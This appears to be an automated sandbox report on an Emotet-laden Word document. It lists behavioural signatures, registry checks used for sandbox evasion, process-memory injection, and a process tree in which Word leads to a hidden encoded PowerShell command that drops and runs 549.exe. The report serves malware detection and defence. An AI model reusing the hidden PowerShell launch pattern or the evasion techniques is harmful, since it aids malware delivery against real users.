Analysis
max time kernel: 28s
resource: win10v191014
submitted: 16-12-2019 11:16
General
Malware Config
Extracted
Extracted
emotet
Signatures
Suspicious use of SetWindowsHookEx (3 IoCs)
  pid   Process
  4936  WINWORD.EXE
  4364  549.exe
  4332  549.exe
Suspicious use of FindShellTrayWindow (1 IoC)
  pid   Process
  4936  WINWORD.EXE
Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid   Process
  4644  Powershell.exe
Executes dropped EXE (2 IoCs)
  pid   Process
  4364  549.exe
  4332  549.exe
Suspicious behavior: EmotetMutantsSpam (1 IoC)
  pid   Process
  4332  549.exe
Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
  description        ioc
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
Suspicious behavior: AddClipboardFormatListener (1 IoC)
  pid   Process
  4936  WINWORD.EXE
Suspicious use of WriteProcessMemory (3 IoCs)
  description                        pid   Process           procid_target
  PID 4400 wrote to memory of 4504   4400  SppExtComObj.exe  76
  PID 4644 wrote to memory of 4364   4644  Powershell.exe    80
  PID 4364 wrote to memory of 4332   4364  549.exe           81
Suspicious use of AdjustPrivilegeToken (1 IoC)
  description              pid   Process
  Token: SeDebugPrivilege  4644  Powershell.exe
Checks system information in the registry (2 TTPs, 2 IoCs)
System information is often read in order to detect sandboxing environments.
  description        ioc
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName
Enumerates system info in registry (2 TTPs, 3 IoCs)
  description        ioc
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5f2fa8f31561486dd05cc43c19240d180891d098fe1891d8df3606b544feabea.doc" /o ""
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of FindShellTrayWindow
  - Suspicious behavior: AddClipboardFormatListener
  PID: 4936

C:\Windows\system32\SppExtComObj.exe
  command line: C:\Windows\system32\SppExtComObj.exe -Embedding
  - Suspicious use of WriteProcessMemory
  PID: 4400
    C:\Windows\System32\SLUI.exe (child of PID 4400)
      command line: "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
      PID: 4504

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
  command line: Powershell -w hidden -en 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
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  - Suspicious use of AdjustPrivilegeToken
  PID: 4644
    C:\Users\Admin\549.exe (child of PID 4644)
      command line: "C:\Users\Admin\549.exe"
      - Suspicious use of SetWindowsHookEx
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      PID: 4364
        C:\Users\Admin\549.exe (child of PID 4364)
          command line: C:\Users\Admin\549.exe --33dd418
          - Suspicious use of SetWindowsHookEx
          - Executes dropped EXE
          - Suspicious behavior: EmotetMutantsSpam
          PID: 4332